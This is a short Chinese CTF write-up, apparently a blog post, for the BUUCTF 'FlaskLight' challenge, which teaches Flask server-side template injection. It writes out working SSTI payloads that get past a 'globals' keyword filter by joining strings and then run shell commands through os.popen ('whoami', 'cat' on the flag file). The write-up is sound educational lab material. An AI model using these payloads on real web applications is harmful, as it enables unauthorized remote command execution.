Loading

[BUUCTF题解][CSCCTF 2019 Qual]FlaskLight

### 知识点

Flask框架的SSTI

过程

做题先搜集(检查HTTP报文+查看初始页面HTML代码),显然看出来和SSTI可能性很大,在初始页面中可以看到接受GET传入的参数search

image-20220324163518774

简单就能验证存在SSTI。

image-20220324163632064

试下过滤的字符,可以注意到search含有globals时就会500返回。

image-20220324163811174

但是妹有过滤引号,直接用字符串就可以拼接。

image-20220324163928267

因为本题妹有对config限制,所以直接用基于config的payload,方便又快捷。

?search={{config.__init__['__global'+'s__'].os.popen("whoami").read()}}

image-20220324164245386

发现flag在根目录下/flasklight/coomme_geeeett_youur_flek中,直接读取获得flag。

?search={{config.__init__['__global'+'s__'].os.popen("cat /flasklight/coomme_geeeett_youur_flek").read()}}

image-20220324164429288

posted @ 2022-03-24 16:47  Article_kelp  阅读(362)  评论(0)    收藏  举报